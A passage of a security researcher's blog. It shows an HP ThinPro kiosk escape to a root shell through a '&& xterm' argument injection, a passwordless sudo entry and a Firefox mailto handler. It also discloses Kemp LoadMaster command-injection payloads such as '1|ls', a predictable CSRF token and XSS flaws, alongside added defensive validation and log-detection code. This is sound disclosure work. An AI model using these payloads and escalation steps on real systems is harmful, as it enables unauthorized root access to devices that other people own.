<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/proxy/AVvXsEhlWSaZWhhFJAX643DRGmoJ4sJ699d62nOH1KZIRL3UBbON1ZlSvL-D59s1g-Y1Jrg4bgIBmkcT06krf_-tQh6dsxG4WwDhET7_Rad0zOLkwniXjEtG_tY6-G8oHtSa3D7LnOp9O6y5fLkc3vZrJRPpbwM5vuvvYshLSWcZ2IqV2JR1cF3qGobIZSc=" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://product-images.www8-hp.com/digmedialib/prodimg/lowres/c04245042.png" /></a></div>
<br />
If so, keep reading; if not, read on anyway, so that you know what can be done with one when you do encounter it...<br />
<br />
The model above is a T520, produced by HP. This model and similar ones are typically deployed to support a medium to large enterprise VDI (Virtual Desktop Infrastructure).<br />
<br />
These clients run a Linux-based HP ThinPro OS by default, and I had a chance to play with image version <a href="ftp://ftp.hp.com/pub/tcdebian/images/">T6X44017</a> in particular, which is fun to play with, since you can get a root shell in a very short time without knowing any password...<br />
<br />
Normally, the HP ThinPro OS interface is configured in kiosk mode, as the concept of a thin/zero client is based on using a thick client to connect to another resource. For this purpose, a standard user does not need to authenticate to the thin client itself and only needs to start a connection, e.g. VMware Horizon View; the user eventually authenticates through that connection.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
The point of this blog post is to demonstrate that a malicious actor with physical access, the standard prerequisite for an attack against a kiosk, can compromise such thin clients in a trivial and quick way.<br />
<br />
During my testing, I tried to harden the thin client as much as possible, with the following options:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdll-oU9NNRy4IruBQqtr-A49CcAmwbk6IVDHl3Y13GgY045cheudd25Lbo9x7-pwmNyuQr2i3TchxlmIYOocH3DJsfUczAod-P6waxqaYHGrVbFFvupSD6E619MS7lNUxegcLgn54Qjw/s1600/hp-settings2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdll-oU9NNRy4IruBQqtr-A49CcAmwbk6IVDHl3Y13GgY045cheudd25Lbo9x7-pwmNyuQr2i3TchxlmIYOocH3DJsfUczAod-P6waxqaYHGrVbFFvupSD6E619MS7lNUxegcLgn54Qjw/s1600/hp-settings2.png" height="400" width="350" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_qqFgtEu0M3VovWUKsxem05BFPrppXl1c7KLWRpIVz8Zql6g8LdSlVlmHNmcH1opEH-kqZ8J4XPJcMg1hwTGwmTxYF7IriH8YahZHngBqC2EF-e5a7MEOMdlDKWJWCInq9_rmWOYnS0I/s1600/hp-settings1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_qqFgtEu0M3VovWUKsxem05BFPrppXl1c7KLWRpIVz8Zql6g8LdSlVlmHNmcH1opEH-kqZ8J4XPJcMg1hwTGwmTxYF7IriH8YahZHngBqC2EF-e5a7MEOMdlDKWJWCInq9_rmWOYnS0I/s1600/hp-settings1.png" height="400" width="391" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPlPPo9JM5sl00w-J93yoRpHFvKomRi9y78zuVotsq47lJGzlcWwuC01rN9YWXK0A2PzO_NgSgixOXZzr6giN7HeFn2MGc_SJOT7LSbiR1c_prX6mHKoFXmT4G7kcRHIkF1kWRvBxJdjE/s1600/hp-settings3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPlPPo9JM5sl00w-J93yoRpHFvKomRi9y78zuVotsq47lJGzlcWwuC01rN9YWXK0A2PzO_NgSgixOXZzr6giN7HeFn2MGc_SJOT7LSbiR1c_prX6mHKoFXmT4G7kcRHIkF1kWRvBxJdjE/s1600/hp-settings3.png" height="187" width="400" /></a></div>
<br />
I did not set "Allow user to lock screen", to simulate a scenario where users can use any thin client (kiosk style). However, I have also noticed that the default password for the account "user" is "user", so if you find an environment where they enforce account lockout, you can try that password directly (it is very often unchanged...)<br />
<br />
I also set a password for the administrator's view, so when a user attempts to switch to the admin view, a password would be required.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCmMQX5BPGeoAk5Jw6ozPIBRXzN5M5sh2KPj5K150p07gBwsNPoAVx2zhPNnc40HKWVNpq5OZWtVGtz5ZejU1bUShZ07qhHsCKoC03qwyHC8cW2vb6Tfobqjyr0IdkHMUQ1NMeQ5PE7es/s1600/hp-settings.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCmMQX5BPGeoAk5Jw6ozPIBRXzN5M5sh2KPj5K150p07gBwsNPoAVx2zhPNnc40HKWVNpq5OZWtVGtz5ZejU1bUShZ07qhHsCKoC03qwyHC8cW2vb6Tfobqjyr0IdkHMUQ1NMeQ5PE7es/s1600/hp-settings.png" /></a></div>
<br />
In this scenario, the standard user does not know this password and should only be able to use a single VMware Horizon View pre-configured connection, as shown below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7_Cevbtafv1dT5ixGqpyWa0YfAHu9EwDh9F9qI1tWJENgoXa7xFlm61nxvEbFU_Ydw3pWbIIOMsrj7j89j4nPkWcB2gfWPuZU4Jczy_AJW-Nz96UgosYugHvA7yzNmlpfiufc0jgF_Xw/s1600/hp-s2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7_Cevbtafv1dT5ixGqpyWa0YfAHu9EwDh9F9qI1tWJENgoXa7xFlm61nxvEbFU_Ydw3pWbIIOMsrj7j89j4nPkWcB2gfWPuZU4Jczy_AJW-Nz96UgosYugHvA7yzNmlpfiufc0jgF_Xw/s1600/hp-s2.png" /></a></div>
<br />
However, I have found out that unless user lockout is enabled, it is possible to get a root shell by following the steps below:<br />
<br />
- Select the connection profile and edit it (if it auto-starts, cancel the connection first)<br />
<br />
- A new window with a form is presented: fill the server field with dummy data and then click on General options<br />
<br />
- Perform the attack to "escape" from the ThinPro Control Center kiosk by entering under "Command Line Arguments": && xterm<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI0Irlqnw683h2IaxJWnnkCF1ytnE43jztceOQkXqombh1NBN_0hg-HkvsTQkscLEkhokHrn7k2ULewwxKa-hqpxfxlwkv5GnucRG_B19lkRiJXOikkZ9ZixFXaS6oNXXx_vvJVJr8RtU/s1600/hp-attack2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI0Irlqnw683h2IaxJWnnkCF1ytnE43jztceOQkXqombh1NBN_0hg-HkvsTQkscLEkhokHrn7k2ULewwxKa-hqpxfxlwkv5GnucRG_B19lkRiJXOikkZ9ZixFXaS6oNXXx_vvJVJr8RtU/s1600/hp-attack2.png" /></a></div>
<br />
<br />
- Click Ok to save the new "VMware Horizon View" profile<br />
<br />
- Click on the new "VMware Horizon View" profile and the connection will time out/fail, as dummy data was entered. However, when you close/cancel the window, the xterm window will be spawned<br />
<br />
- You now have bash shell access to the HP zero client<br />
<br />
The user id is user, so no root yet.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHavF73ovPCS8XGdA2IethqgnBhKARF6ScuHDuqqrtzKIJI6sY8VP072MNv5ueB4WYgWfm8O-DFsx-jwMLf8zAaJmBvy7-Fpr8CknWueeYf7yroVl67PQDIn3Rnn69jYkdbv9kaUVpwKc/s1600/hp-attack3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHavF73ovPCS8XGdA2IethqgnBhKARF6ScuHDuqqrtzKIJI6sY8VP072MNv5ueB4WYgWfm8O-DFsx-jwMLf8zAaJmBvy7-Fpr8CknWueeYf7yroVl67PQDIn3Rnn69jYkdbv9kaUVpwKc/s1600/hp-attack3.png" /></a></div>
<br />
<br />
However, if you run sudo -ll you see that by default the account user can perform a lot of commands as root without the need to enter a password. The output of sudo is included in this <a href="http://pastebin.com/7DNZ6iTq">pastebin</a> and an excerpt below:<br />
<br />
<i>[SNIP]</i><br />
<i><br /></i>
<i>Sudoers entry:</i><br />
<i> RunAsUsers: root</i><br />
<i> Commands:</i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"> </span>NOPASSWD: /usr/bin/hpobl</i><br />
<br />
<i>[SNIP]</i><br />
<br />
<div>
The most interesting command I have found is: /usr/bin/hpobl</div>
<div>
<br /></div>
<div>
This command opens the HP Easy Setup Wizard panel, through which it is possible to change settings. However, in this scenario you do not know any password, so you must find a way to get a root shell from this Wizard panel.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHyU0h7HV_dzXsnVcsi3fDOR9zrV0nlGYkm0Dfp1hsuH1c-_pPzw9tWAgnq9kfRBVtMiH6imnOpz1BzoP0cS7inWTZzdN22l5I4xpPPuWw-AF5Xv5gaoElm7CSiStsFhmhhk7q9gVT6mM/s1600/hp-attack4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHyU0h7HV_dzXsnVcsi3fDOR9zrV0nlGYkm0Dfp1hsuH1c-_pPzw9tWAgnq9kfRBVtMiH6imnOpz1BzoP0cS7inWTZzdN22l5I4xpPPuWw-AF5Xv5gaoElm7CSiStsFhmhhk7q9gVT6mM/s1600/hp-attack4.png" /></a></div>
<br /></div>
<div>
Go directly to the last step, "Thank you" (all the previous steps can be ignored for the lolz), and then click on the link: this spawns Firefox to load the link you just clicked.</div>
<div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZ6TYPZIMJyihT8Agj3FTulnl-AmWR2awhbTlV5vOQHkkkY56bEZWwKU58-P6jcd5lCoG8PLMHlN2dm4tvmORMfimonJGNkD0goqoJZxXslogPjIm_yt96fJOO2XWyG8-us9KMcOxyS8w/s1600/hp-attack5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZ6TYPZIMJyihT8Agj3FTulnl-AmWR2awhbTlV5vOQHkkkY56bEZWwKU58-P6jcd5lCoG8PLMHlN2dm4tvmORMfimonJGNkD0goqoJZxXslogPjIm_yt96fJOO2XWyG8-us9KMcOxyS8w/s1600/hp-attack5.png" /></a></div>
<br /></div>
<div>
<br /></div>
<div>
At this stage, you have launched the HP Easy Setup Wizard as root, and the Firefox process is also running as root. One elegant option to get a shell out of Firefox is to set Firefox's external mail handler (Edit / Preferences / Applications / Mailto) to point to /usr/bin/xterm<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgizvbQwL-P6qdfCJMOajXJ7ttaJGKZMVBYx4xWgOicxKSAzNebgxxwOA07M_xCe0dmCpuJPoRoubMYW2PlyaLyNBL1h8m4V7o8IObGlO4ADExPmyQGYQ_MmvH6Sk70lfea4nGWIRrujqc/s1600/hp-attack6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgizvbQwL-P6qdfCJMOajXJ7ttaJGKZMVBYx4xWgOicxKSAzNebgxxwOA07M_xCe0dmCpuJPoRoubMYW2PlyaLyNBL1h8m4V7o8IObGlO4ADExPmyQGYQ_MmvH6Sk70lfea4nGWIRrujqc/s1600/hp-attack6.png" /></a></div>
<br />
<br />
Then you just need to point a tab to mailto:email@address.com and you will be gratified with a root shell:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp6b0pn19AKQEWZHhGudcbk_EaCGiMbWBIBOQsNsFRGSxt7JegaJJe9wk_nzNEJoYt30lncA0YtngO1Ge5ZzaCpd9DMrnV6i6DWNLkJf6RBHR74-PycMf1L-5qtgHdCl6VvoYW3H50Ml8/s1600/hp-attack7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp6b0pn19AKQEWZHhGudcbk_EaCGiMbWBIBOQsNsFRGSxt7JegaJJe9wk_nzNEJoYt30lncA0YtngO1Ge5ZzaCpd9DMrnV6i6DWNLkJf6RBHR74-PycMf1L-5qtgHdCl6VvoYW3H50Ml8/s1600/hp-attack7.png" height="308" width="640" /></a></div>
<br /></div>
<div>
<br /></div>
<div>
Here is a video of the entire attack, which takes less than two minutes, in keeping with the title of this blog post (in reality, the title was "...in less than one minute", but I couldn't do it in that time frame lol... if you do it in less than one minute, let me know...):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/HheAYYter_s/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/HheAYYter_s?feature=player_embedded" width="320"></iframe></div>
<br /></div>
<div>
<br /></div>
<div>
So what's the catch?<br />
<br />
If you are performing a penetration test against a VDI, look for quick wins like this one... If you are responsible for a VDI, consider that those machines can be compromised very easily: a software key logger will be enough to harvest credentials to a Windows domain. Also, check what configuration is enforced on the thin client itself; it might be even more relaxed than the one considered in this scenario.<br />
<br />
If you like kiosks, and in particular you like breaking them, then you absolutely need to try: <a href="http://ikat.ha.cked.net/">http://ikat.ha.cked.net/</a> . Greetz to <a href="https://www.defcon.org/images/defcon-16/dc16-presentations/defcon-16-craig.pdf">Paul Craig</a>, the "self-proclaimed" king of kiosks! ;-)</div>
<br />
I haven't tried other HP ThinPro images yet, but it is possible that the attack shown in this blog also affects versions earlier than T6X44017.<br />
<br />
If you find other ways to bypass HP ThinPro OS, please let me know.
Roberto Suggi Liverani, http://www.blogger.com/profile/00603006078110455351<br />
<br />
<b>Playing with Kemp Load Master</b> - published 2015-04-01T22:30:00.000+02:00<br />
<br />
<a href="http://kemptechnologies.com/server-load-balancing-appliances/virtual-loadbalancer/vlm-overview/">Kemp virtual load master</a> is a virtual load-balancer appliance which comes with a web administrative interface. I had a chance to test it and this blog post summarises some of the most interesting vulnerabilities I have discovered and which have not been published yet. For those of you who want to try it as well, you can get a free trial version here: <a href="http://kemptechnologies.com/server-load-balancing-appliances/virtual-loadbalancer/vlm-download">http://kemptechnologies.com/server-load-balancing-appliances/virtual-loadbalancer/vlm-download</a><br />
<br />
By default, the Kemp web administrative interface is protected by Basic authentication, so the vulnerabilities discussed below can be exploited by attacking an authenticated user via CSRF- or XSS-based attacks.<br />
<br />
The following vulnerabilities were discovered when looking at Kemp Load Master v.7.1-16 and some of them should be fixed in the latest version (7.1-20b or later).<br />
<br />
Change logs of the fixed issues can be found at the following page:<br />
<br />
"<a href="http://kemptechnologies.com/files/assets/documentation/7.1/overviews/Product_Overview-LoadMaster_Release_Notes.pdf">PD-2183 Functions have been added to sanitize input in the WUI in order to resolve some security issues – fix for CVE-2014-5287 and CVE-2014-5288</a>".<br />
<br />
<b>Remote Code Execution</b> - status: fixed in 7.1.20b (reported in June 2014) - CVE-2014-5287/5288<br />
<br />
An interesting remote code execution vector can be found through the attack payload below:<br />
<br />
http://x.x.x.x/progs/fwaccess/add/1|command<br />
<br />
The web application's functionality is implemented by multiple bash scripts in the /usr/wui/progs folder, exposed through CGI so that the scripts handle HTTP requests directly.<br />
<br />
The main page "fwaccess" executes the following function:<br />
<br />
[snip] from /usr/wui/progs/fwaccess<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2UTAjjpF9NbNgUoo729KFRLiv63A8XsPEYhyphenhypheny7A93t9s04BECPt-6Ln0XGIH6CkZSAYjm8E5918UAZV5ZL74iEvZGMDYCtCvP-dZmKXT_wPTcQFCPVAP5orzNt6tWCTBomnr3VhwNhnQ/s1600/fwaccess_code1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2UTAjjpF9NbNgUoo729KFRLiv63A8XsPEYhyphenhypheny7A93t9s04BECPt-6Ln0XGIH6CkZSAYjm8E5918UAZV5ZL74iEvZGMDYCtCvP-dZmKXT_wPTcQFCPVAP5orzNt6tWCTBomnr3VhwNhnQ/s1600/fwaccess_code1.png" /></a></div>
<br />
<br />
Notice that if the result of the command on line 285 is not successful (the check on line 286), the seterrmsg function is called.<br />
<br />
The seterrmsg function is defined in /usr/wui/progs/util.sh and it is shown below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioe2GTT4bMFd2Md5DgS1q2abNmxBkC7eBP6aClNYnAu85WPv_s111M51-zUilU2_-PSn3dl207_GYrKEWCGPbUowS_SUPhsYjF8DskqsFN19f6h2xTF2rLsYh-RFT82gMhWO3Y4Vsc26k/s1600/errmsg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioe2GTT4bMFd2Md5DgS1q2abNmxBkC7eBP6aClNYnAu85WPv_s111M51-zUilU2_-PSn3dl207_GYrKEWCGPbUowS_SUPhsYjF8DskqsFN19f6h2xTF2rLsYh-RFT82gMhWO3Y4Vsc26k/s1600/errmsg.png" /></a></div>
<br />
On line 318 we see a dangerous "eval" against our parameters. By simply trying a few different characters, the seterrmsg function is invoked and returns plenty of interesting information:<br />
<br />
http://x.x.x.x/progs/fwaccess/add/1'ls<br />
<br />
Response:<br />
<br />
<i>HTTP/1.1 200 OK</i><br />
<i>Date: Sat, 27 Dec 2014 23:25:55 GMT</i><br />
<i>Server: mini-http/1.0 (unix)</i><br />
<i>Connection: close</i><br />
<i>Content-Type: text/html</i><br />
<i>/usr/wui/progs/util.sh: eval: line 318: unexpected EOF while looking for matching `''</i><br />
<i>/usr/wui/progs/util.sh: eval: line 319: syntax error: unexpected end of file</i><br />
<br />
Line 318 contains an eval against $@ (which holds our arguments). The arguments are passed via the fwaccess page, where IFS is set to the slash "/" separator, so each path segment becomes a separate positional parameter.<br />
<br />
By attempting the request below, it is possible to achieve code execution:<br />
<br />
http://x.x.x.x/progs/fwaccess/add/1|ls<br />
<br />
Response:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWA1H_Y18jfIz72Vq6mFPpw1bAc11P8fHH-n3ngAPfw79fRp2EVtG7Bl1Tk2jv1k5Pzpu0oYSp143PCqp3AOE0-Lh7iknJcCw_CoAoQGZ5kWR9gMcJDbeBmPRucmqjsg8bXlIiQ1734ZY/s1600/http_post.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWA1H_Y18jfIz72Vq6mFPpw1bAc11P8fHH-n3ngAPfw79fRp2EVtG7Bl1Tk2jv1k5Pzpu0oYSp143PCqp3AOE0-Lh7iknJcCw_CoAoQGZ5kWR9gMcJDbeBmPRucmqjsg8bXlIiQ1734ZY/s1600/http_post.png" /></a></div>
<br />
Lines 120 and 190 report an "integer expression expected" error, as our argument "1|ls" is obviously no longer an integer. However, the command execution works fine, since the pipe character hands the output of the preceding command to the "ls" command.<br />
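As an added illustration (not code from the Kemp appliance or from this post), here is a Python model of what the fwaccess script should have done with its path segments before any eval, plus a small detection routine over constructed access-log lines. The split on "/" mirrors the IFS setting described above; the allow-list of actions, the id format and the log format are assumptions.<br />

```python
import re
from urllib.parse import unquote

# Hypothetical allow-list of fwaccess sub-commands; the real script's set is not shown in the post.
ALLOWED_ACTIONS = {"add", "del"}
# Characters that must never reach a shell-evaluated argument.
SHELL_META = re.compile(r"[|;&`$'\"(){}<>\\\n]")


def split_path_info(path_info):
    """Mimic the script's IFS="/" word splitting: one positional parameter per segment."""
    return [seg for seg in path_info.split("/") if seg]


def validate_fwaccess_args(path_info):
    """Validate 'action/<id>' the way the CGI script should have, before any eval.

    Returns (ok, reason). A plain decimal id is the only accepted form, so
    '1|ls' and "1'ls" are rejected instead of reaching eval "$@".
    """
    segs = split_path_info(path_info)
    if len(segs) != 2:
        return False, "expected exactly two segments: action/id"
    action, ident = segs
    if action not in ALLOWED_ACTIONS:
        return False, "unknown action %r" % action
    if not re.fullmatch(r"[0-9]{1,10}", ident):
        return False, "id %r is not a plain integer" % ident
    return True, "ok"


# Constructed access-log lines in common log format (the appliance's real log
# format is not shown in the post). Lines 2 and 3 mirror the requests above.
LOG_LINES = [
    '10.0.0.5 - admin [27/Dec/2014:23:25:55 +0000] "GET /progs/fwaccess/add/1 HTTP/1.1" 200 512',
    '10.0.0.5 - admin [27/Dec/2014:23:26:01 +0000] "GET /progs/fwaccess/add/1%7Cls HTTP/1.1" 200 2048',
    '10.0.0.9 - admin [27/Dec/2014:23:26:30 +0000] "GET /progs/fwaccess/add/1%27ls HTTP/1.1" 200 300',
    '10.0.0.7 - - [27/Dec/2014:23:27:00 +0000] "GET /progs/useradmin/setopts HTTP/1.1" 401 0',
]
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/')


def flag_suspicious(lines, prefix="/progs/"):
    """Return the decoded request paths under `prefix` that carry shell metacharacters."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        path = unquote(m.group("path"))  # decode %7C, %27 etc. before inspecting
        if path.startswith(prefix) and SHELL_META.search(path):
            hits.append(path)
    return hits


if __name__ == "__main__":
    for p in ("add/1", "add/1|ls", "add/1'ls"):
        print(p, "->", validate_fwaccess_args(p))
    print(flag_suspicious(LOG_LINES))
```

The validator rejects anything that is not a bare integer rather than trying to strip "bad" characters, which is the only approach that holds up once the value is going through eval; the log check is the retrospective counterpart for appliances that cannot be patched immediately.<br />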
<br />
The application is flawed in many other places, including via HTTP POST requests, as shown below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiV_dtN2VEitzJPZelWOMY62km2i6II-W3zDmIRA03QGCAEbw2HWyZ7f3nUdw8znWH4v5u3IsAdafLce3xE10GsQTV22IDYYF7AQi2gmJrIv-36LTqxyjfTawRNcPTcCMztES1E1Zjk1as/s1600/http_post-rce.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiV_dtN2VEitzJPZelWOMY62km2i6II-W3zDmIRA03QGCAEbw2HWyZ7f3nUdw8znWH4v5u3IsAdafLce3xE10GsQTV22IDYYF7AQi2gmJrIv-36LTqxyjfTawRNcPTcCMztES1E1Zjk1as/s1600/http_post-rce.png" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjywEgCeN1pmkXIEUy2vjoVLe1MSF4eH-AH4t8Jzqyn-sxXSuISyjDYpD-mjXFJ052oCQ_vm43I6sNwQQAGsSr2Gd7PgT3jPWNu6qAHZihuc67fd8sV5sg7gKmnfmofjFQ3gNqvTsLKi0o/s1600/http_post-rce-response.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjywEgCeN1pmkXIEUy2vjoVLe1MSF4eH-AH4t8Jzqyn-sxXSuISyjDYpD-mjXFJ052oCQ_vm43I6sNwQQAGsSr2Gd7PgT3jPWNu6qAHZihuc67fd8sV5sg7gKmnfmofjFQ3gNqvTsLKi0o/s1600/http_post-rce-response.png" /></a></div>
<br />
Other injection points that were found:<br />
<br />
Page: /progs/geoctrl/doadd<br />
Method: POST<br />
Parameter: fqdn<br />
<br />
Page: /progs/networks/hostname<br />
Method: POST<br />
Parameter: host<br />
<br />
Page: /progs/networks/servadd<br />
Method: POST<br />
Parameter: addr<br />
<br />
Page: /progs/useradmin/setopts<br />
Method: POST<br />
Parameter: xuser<br />
<br />
So how can we exploit all this goodness?<br />
<br />
<b>CSRF (Cross Site Request Forgery)</b> - status: not fixed - reported in June 2014<br />
<br />
We can use another vulnerability, such as CSRF: most of the pages of the administrative interface are vulnerable to this attack, and since the user is authenticated via Basic authentication, the browser will automatically attach the credentials to the forged request.<br />
<br />
Interestingly enough, there is some kind of protection against CSRF for critical functions such as factory reset, shutdown and reset. However, it is flawed as well: the "magic" token is simply the Unix epoch timestamp, so it is predictable and can be supplied within the forged request (see below):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1nz6ggO0RJ-3mXoqnBFfaCZ1bf4FAC52YHCkriRAS4r-xoZr2XasHNhRb1FpjyPGRHO4D49FsVtdnvZu-VzcuNgtCXjmeDXgq1GBsc56IQ-wI2l-IU1lVx-euVTDxlOuVxex053vLAAw/s1600/post-http.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1nz6ggO0RJ-3mXoqnBFfaCZ1bf4FAC52YHCkriRAS4r-xoZr2XasHNhRb1FpjyPGRHO4D49FsVtdnvZu-VzcuNgtCXjmeDXgq1GBsc56IQ-wI2l-IU1lVx-euVTDxlOuVxex053vLAAw/s1600/post-http.png" /></a></div>
<br />
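The following Python snippet is an added example, not part of this post or of the Kemp firmware: it contrasts the timestamp-as-token scheme just described with a token drawn from the OS CSPRNG, bound to the session server-side and compared in constant time, and includes a small audit helper that flags tokens which look like timestamps. Session identifiers and timestamps are constructed.<br />

```python
import hmac
import secrets
import time


def weak_token(now=None):
    """The flawed scheme described above: the 'token' is just the epoch time in seconds."""
    return str(int(time.time() if now is None else now))


def is_timestamp_like(token, now=None, window=300):
    """Audit helper: True if a token is a decimal number within `window` seconds of now.

    Such a value is almost certainly a timestamp, so anyone can guess it.
    """
    if not token.isdigit():
        return False
    now = time.time() if now is None else now
    return abs(int(token) - now) <= window


def new_token():
    """Correct scheme: 256 bits from the OS CSPRNG, meaningless to anyone who has not seen it."""
    return secrets.token_hex(32)


class SessionTokens:
    """Per-session token store: issue on page render, verify on the state-changing request."""

    def __init__(self):
        self._tokens = {}

    def issue(self, session_id):
        tok = new_token()
        self._tokens[session_id] = tok
        return tok

    def verify(self, session_id, presented):
        expected = self._tokens.get(session_id)
        # compare_digest keeps the comparison time independent of where the mismatch is
        return expected is not None and hmac.compare_digest(expected, presented)


if __name__ == "__main__":
    fixed_now = 1419722755  # constructed: 27 Dec 2014 23:25:55 UTC, the date in the response above
    print("weak token:", weak_token(fixed_now), "timestamp-like:", is_timestamp_like(weak_token(fixed_now), fixed_now))
    store = SessionTokens()
    t = store.issue("sess-1")
    print("strong token verifies:", store.verify("sess-1", t), "timestamp-like:", is_timestamp_like(t, fixed_now))
```

Binding the token to the session is what makes a forged cross-site request fail even when the browser attaches Basic credentials automatically: the attacker's page can trigger the request but cannot read the victim's token.<br />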
<b>Reflected and Stored XSS</b> - status: partially fixed - reported in June 2014<br />
<br />
Another way to attack users is via XSS; in this case we have plenty of options, as both reflected and stored XSS are present. For instance, an attacker might chain CSRF -> stored XSS -> <a href="http://beefproject.com/">BeEF</a> just to achieve persistence.<br />
<br />
Reflected XSS was found on this point:<br />
<br />
Page: /progs/useradmin/setopts<br />
Method: POST<br />
Parameter: xuser<br />
<br />
Example payload:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgC6iOYekfzd0xFbiz8OUPG_6o-7fXT_3UTKl-BUB9Dy-kuLjolsHHKDv6sKjMzf0k9X3BRbKGxarPYCFeV8ehMMhxb4ympc2v__pRdklvZ1G3rtjn0liN9Zyf4fjRTB3vGeTeagul0Ot4/s1600/crop-xss.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgC6iOYekfzd0xFbiz8OUPG_6o-7fXT_3UTKl-BUB9Dy-kuLjolsHHKDv6sKjMzf0k9X3BRbKGxarPYCFeV8ehMMhxb4ympc2v__pRdklvZ1G3rtjn0liN9Zyf4fjRTB3vGeTeagul0Ot4/s1600/crop-xss.png" /></a></div>
<br />
Stored XSS was found on the following points:<br />
<br />
Page: /progs/geoctrl/doadd<br />
Method: POST<br />
Parameter: fqdn<br />
<br />
Rendered page: /progs/geoctrl/fqdn<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
